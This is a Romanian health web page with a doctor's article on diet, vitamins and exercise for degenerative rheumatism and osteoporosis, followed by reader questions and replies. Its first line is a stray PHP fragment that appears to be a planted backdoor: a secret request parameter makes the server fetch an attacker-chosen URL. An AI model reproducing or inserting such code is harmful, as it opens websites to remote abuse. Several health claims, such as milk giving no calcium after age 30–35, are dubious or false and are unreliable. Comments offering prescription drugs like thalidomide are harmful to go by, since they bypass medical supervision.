isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Reumatismul degenerativ si osteoporoza - MedicAS

Alimentatia pentru reumatismul degenerativ si osteoporozaReumatismul degenerativ intruneste o paleta larga de suferinte: osteoarticulare ( artroze,dar si poliartrita reumatoida) , ligamentare , ale tendoanelor si invelisurilor musculare , ale muschilor. Sunt incriminate , printer altele, si cauze alimentare. In cadrul acestora se remarca depunerea la nivelul suprafetelor articulare , a unor granule rezultate din produsii de degradare ai proteinelor de origine animala .Acestea “ freaca” suprafetele articulare producand microtraumatisme , perpetuarea consumului are ca si consecinta agravarea degradarii.

Osteoporoza presupune o fragilizare a oaselor cu predispozitie la fracturi. Cel mai frecvent sunt afectate : soldurile, incheieturile manilor, coloana vertebrala . Boala apare cel mai frecvent la femeile aflate la menopauza , dar exista si femei tinere cu risc inalt la osteoporoza : cele care practica in exces exercitii fizice grele , dansatoarele, anorexicele .

Osteoporoza apare si la barbati , in asociere sau ca urmare a unor obiceiuri proaste : fumatul , consumul de alcool , sare, cafea , in exces .Aceste cauze actioneaza , bineinteles si la femei , si chiar mai accentuat .

Ce tip de alimentatie este corect ?

In primul rand trebuie sa acceptam idea ca fiecare in parte suntem responsabili pentru starea noastra de sanatate , apoi vin medicii , medicamentele .Daca ne adaptam alimentatia la nevoile , predispozitiile patologice sau la patologia déjà existenta-ne ajutam singuri foarte mult .

Concret-in cazul acestor afectiuni trebuie redus consumul de carne ( porc,vanat,vita,pasari de curte) si privilegiat consumul de peste - sursa excelenta de proteine si acizi grasi omega3- cu carater antiinflamator intens si aport crescut de vitamina D.

Aportul de calciu-indispensabil in prevenirea si tratarea osteoporozei-trebuie asigurat prin consumul legumelor cu fructe verzi (mai putin spanacul , care contine acid oxalic si duce la blocarea absorbtiei calciului). Alta sursa bogata sunt produsele de soia – in primul rand tofu(branza de soia),care aduce si fitoestrogeni, ce ajuta la absorbtia calciului si “imblanzesc” simptomele neplacute ale menopauzei.Femeile asiatice care consuma toata viata soia nu cunosc bufeurile,si celelalte manifestari neurovegetative ale menopauzei.

Laptele dulce nu constituie o sursa de calciu dupa varsta de 30-35 ani , cand lactaza –enzima responsabila de absorbtie, scade drastic.Se indica produsele acidifiate : kefirul si iaurturile cu probiotice, desigur din lapte degresat.Ideale sunt cele obtinute din lapte de capra si oaie ( acesta obligatoriu degresat ). Infestarea lor cu metale grele , pesticide , este mai redusa decat a laptelui de vaca .O sursa foarte buna de calciu o constituie cojile de oua uscate si pisate.Ca supliment alimentar cu calciu cel mai benefic este cel obtinut din corali.

Respectarea celor de mai sus este benefica si pentru protectia aparatului cardio-vascular, profilaxia aterosclerozei , mentinerea in limite normale a valorilor tabloului lipidic si a greutatii corporale.Deci “ se pot impusca mai multi iepuri dintr-un foc “.

Ce rol au vitaminele ?

In aparitia suferintelor reumatice se stie ca lipsa vitaminelor A,C,E joaca un rol important. Asadar principiul consumarii a 5 portii de legume si fructe /zi ajuta si in aceste cazuri , aducand vitamine, enzime diverse , fibre , apa.Aceasta inseamna : fortifierea sistemului imunitar,aport masiv de antioxidanti,usurarea digestiei , eliminarea toxinelor,o functie renala buna , deci scaderea riscului aparitiei manifestarilor reumatice.

Vitamina A ( de fapt betacaroten ) se obtine din legumele cu frunze verzi , legumele si fructele galbene, portocalii si rosii : morcovi ( mai ales preparati termic), caise , grapefruit, ardei gras rosu . Portocalele – prea acide – sunt de evitat.

Vitamina C provenita din legume cu frunze verzi , ardei gras , lamai , kiwi, si autohtonele : macese si catina au un continut mai bogat decat citricile . O alta sursa excelenta o constituie coacazele negre . Vitamina C – unul din cei mai puternici agenti antioxidanti si cu o capacitate antiinflamatorie deosebit de mare reduce riscurile aparitiei aterosclerozei , a bolilor cardiovasculare , intareste sistemul umanitar , si scade de asemenea riscul aparitiei reumatismelor degenerative si a osteoporozei.

Vitamina E provenita din uleiul de masline extravirgin , dar si din cel de floarae-soarelui , din nucile proaspat decojite si din avocado , constituie un ajutor pretios in prevenirea si tratarea reumatismului . Atentie la migdale , bogate in vitamina E , dar si in acid fitic , care scade absorbtia calciului.

Vitamina D se fabrica in piele prin expunere la soare , atentie insa la riscuri .O expunere zilnica de 10 min la soare aduce in mod normal suficienta vitamina D. Ca sursa suplimentara sunt indicate : uleiul de ficat de peste ( bogat si in acizi omega3 ), galbenusul de ou ( 1-2/saptamana) , pestele – ton,somon , sardine,pastrav.

Seleniul este un oligoelement implicat in protectia suprafetelor articulare. Surse indicate : cereale integrale, nuci, peste sau suplimente alimentare.

Care ar trebui sa fie programul de miscare in prevenirea reumatismului degenerativ si a osteoporozei ?

Se indica in primul rand banalul si necostisitorul mers pe jos. Cu tinuta dreapta , imbracaminte lejera , din fibre cat mai naturale si bineinteles incaltaminte comoda cu talpa flexibila . Ideal ar fi o plimbare de 45-60 minute/zi , dar si 30 de minute de minim 3ori pe saptamana au un efect favorabil .Caratul greutatilor de peste 10 kg si mai ales neechilibrarea in cele 2 mani este nociv pentru coloana vertebrala, umeri, solduri, genunchi .Specific acest lucru pentru ca multe personae afirma ca se misca toata ziua , lucrand sau carand cumparaturi .Aceste activitati nu sunt echivalente cu exercitiile indicate mai sus .

O forma de miscare benefica este “walking-ul” un fel de ski pe uscat. Joggingul practicat de 3-5 ori pe saptamana cate 45-60 minute este excelent , facand si preventia bolilor cardiovasculare .

Foarte indicat este inotul in apa la temperaturi de 20-27 grade Celsius Este sportul aproape ideal in toate formele de reumatism si in acelasi timp protectiv pentru aparatul cardio- vascular.Pe langa beneficiile directe asupra sistemului osteoarticular , al ligamentelor , tendoanelor , muschilor , miscarea adecvata aduce beneficii intregului organism , consolidand sistemul imunitar , crescand tonusul psihic.

O mentiune speciala pentru tinerele doamne si domnisoare care “ trag “ intens chiar si 2-3 ore la sala . Prin aceste eforturi supraliminale asociate si cu carente alimentare , scade prea mult stratul de grasime si productia de estrogeni .In schimb creste cantitatea de radicali liberi produsi .Pe de alta parte greutatea corporala prea mica scade presiunea benefica exercitata pe oase , acestea sunt insufucient solicitate si apare riscul demineralizarii – deci al osteoporozei.

Unele exercitii care solicita intensiv genunchiul si soldurile pot duce la leziuni ale suprafetelor articulare , urmate in timp de aparitia artrozelor .Suprasolicitarea coloanei vertebrale, poate cauza discopatii , contracturi de durata a musculaturii paravertebrale si spondiloze.

Concluzia : efortul fizic este benefic daca este efectuat cu masura , in conformitate cu nevoile si predispozitiile fiecarui organism si in concordanta cu varsta biologica.

Dr. Rodica Nicolescu


Cuvinte relevante: , ,


Articole asemănătoare:

9 Răspunsuri la “Cum prevenim reumatismul degenerativ si osteoporoza?”


  1. voinea gabriel :

    Poti beneficia de pensie de handicap, daca suferi de osteoporoza? Va multumesc.


  2. maria :

    foarte necesar ceea ce ati relatat in articol.Am 50 ani,de 3 luni sunt la menopauza,si simt o raceala in organism,ma dor incheieturile,am luat 3 luni Omega 3 + Omega 6,coenzima Q10 in ulei de catina,si sper o imbunatatire a starii de sanatate.Credeti ca am procedat bine ?


  3. MARIA :

    si eu sufar de reumatism degenerativ si osteoporoza.momentan iau pastile de artrostop plus .intrebarea mea este,fac bine? fac miscare zilnic, dar cel mai rau este faptul ca dupa ce fac un efort mai mare (adica fac curatenie deretic prin casa sau vin de la piata cu cumparaturi a doua zi nu mai imi simt mainile si ma dor toate incheeturile).mai specific ca am sechele polomelita membrul inferior stang de la varsta de 1an.eu am pus aceste dureri articulare ale genunchiului drept pe seama faptului ca toata greutatea corporala o suporta in mare parte piciorul drept.(fiind o diferenta de 5cm intre lungime).astept raspuns pe adresa de mail pe care am scriso la inceput.Custima si respect MARIA.Brasov.13.11.08.


  4. emil :

    vand 12 fiole de DISFONAL ,indicat in osteoporoza,mielom multiplu,osteoliza tumarala,hiperparatiroidism primar,pret 10 ron/fiola.


  5. HAINI :

    Stimata d-na MARIA in legatura cu artrostop plus nu este bun pt. osteoporoza, acesta reface articulatiile si protejeaza capetele oaselor. Am folosit si eu asa ceva, ca am coxatroza pe partea stg. si am si greutatea destul de mare. De 3 ori am repetat pe an acest tratament si inca am facut un tratament cu Flexodon A, 6luni de zile,dar acesta nu ajuta deloc in prevenirea osteoporozei….Si …ATENTIE aceste suplimente alimentare contin glucozamin si condroitin si trebuie sa stati foarte bine cu glicemia! Consultati un medic! Sanatate buna va doresc!!!


  6. Busu Bianca :

    Poti beneficia de pensie de handicap daca ai osteoporoza?


  7. naftica :

    Poti beneficia de pensie de handicap daca ai osteoporoza?


  8. Andreea :

    Buna seara.
    Pentru o persoana care sufera de mielom multiplu , oferim capsule de THALIDOMIDE GRATIS.


  9. anonim :

    eu am dureri foarte mari de cap coloana picioare maini toate oasele.noaptea este mai acentuata durerea in special in a doua parte a noptii.Am fost la doctor si mi-a spus ca e reumatism.Acum m-am mai linistit inainte crezand ca am tot felul de boli.Din acea cauza eram si foarte deprimanta.Si acum durerea mi se muta de la un loc la altul dar urmez tratament .O sa ma simt mult mai bine.Doctorul a zis ca trebuie sa fiu optimista.Aces reumatism s-a format deoarece stau prea mult la calculator asta fiind serviciul meu.Deci fiti optimisti fratilor orice boala are scapare ,doar credeti!
    V-am pupat



Adaugă un comentariu






 
 

Newsletter

Loading... Loading...